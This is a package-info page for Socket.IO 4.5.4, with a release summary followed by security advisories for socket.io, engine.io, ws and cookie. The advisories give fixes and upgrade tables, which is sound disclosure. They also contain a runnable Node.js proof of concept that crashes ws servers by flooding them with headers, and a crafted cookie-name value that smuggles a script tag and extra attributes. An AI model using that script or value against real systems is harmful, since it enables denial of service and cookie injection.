Socket.IO version 4.5.4 introduces subtle but important updates compared to the previous stable version 4.5.3. Primarily, the underlying engine.io dependency sees an upgrade to version 6.2.1 from 6.2.0. Furthermore, the socket.io-parser dependency is bumped to version 4.2.1 from 4.2.0. These internal dependency updates often bring performance enhancements, bug fixes, and security patches within the core engine and data parsing mechanisms, contributing to a more robust and efficient real-time communication experience.
Developers should be aware of these incremental changes as they might impact the behavior of their Socket.IO applications, although in most cases, these are transparent improvements. Reviewing the changelogs for engine.io and socket.io-parser is recommended for a deeper dive into the specific alterations introduced. For developers using Socket.IO in production environments, careful testing after upgrading to version 4.5.4 is crucial to ensure seamless integration and identify any potential compatibility issues, however unlikely, stemming from the dependency updates. The unpacked size also slightly increases suggesting added functionalities or refinements as well. Remember that Socket.IO facilitates real-time, bidirectional communication between web clients and servers, and staying up-to-date with the latest versions helps ensure optimal performance and security.
All the vulnerabilities related to the version 4.5.4 of the package
socket.io has an unhandled 'error' event
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
node:events:502
throw err; // Unhandled 'error' event
^
Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
at new NodeError (node:internal/errors:405:5)
at Socket.emit (node:events:500:17)
at /myapp/node_modules/socket.io/lib/socket.js:531:14
at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
code: 'ERR_UNHANDLED_ERROR',
context: undefined
}
| Version range | Needs minor update? |
|------------------|------------------------------------------------|
| 4.6.2...latest | Nothing to do |
| 3.0.0...4.6.1 | Please upgrade to socket.io@4.6.2 (at least) |
| 2.3.0...2.5.0 | Please upgrade to socket.io@2.5.1 |
This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).
The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:
io.on("connection", (socket) => {
socket.on("error", () => {
// ...
});
});
If you have any questions or comments about this advisory:
Thanks a lot to Paul Taylor for the responsible disclosure.
engine.io Uncaught Exception vulnerability
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
TypeError: Cannot read properties of undefined (reading 'handlesUpgrades')
at Server.onWebSocket (build/server.js:515:67)
This impacts all the users of the engine.io package, including those who uses depending packages like socket.io.
A fix has been released today (2023/05/02): 6.4.2
This bug was introduced in version 5.1.0 and included in version 4.1.0 of the socket.io parent package. Older versions are not impacted.
For socket.io users:
| Version range | engine.io version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------|
| socket.io@4.6.x | ~6.4.0 | npm audit fix should be sufficient |
| socket.io@4.5.x | ~6.2.0 | Please upgrade to socket.io@4.6.x |
| socket.io@4.4.x | ~6.1.0 | Please upgrade to socket.io@4.6.x |
| socket.io@4.3.x | ~6.0.0 | Please upgrade to socket.io@4.6.x |
| socket.io@4.2.x | ~5.2.0 | Please upgrade to socket.io@4.6.x |
| socket.io@4.1.x | ~5.1.1 | Please upgrade to socket.io@4.6.x |
| socket.io@4.0.x | ~5.0.0 | Not impacted |
| socket.io@3.1.x | ~4.1.0 | Not impacted |
| socket.io@3.0.x | ~4.0.0 | Not impacted |
| socket.io@2.5.0 | ~3.6.0 | Not impacted |
| socket.io@2.4.x and below | ~3.5.0 | Not impacted |
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
engine.ioThanks to Thomas Rinsma from Codean for the responsible disclosure.
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
--max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.server.maxHeadersCount to 0 so that no limit is applied.The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.
A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.
Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.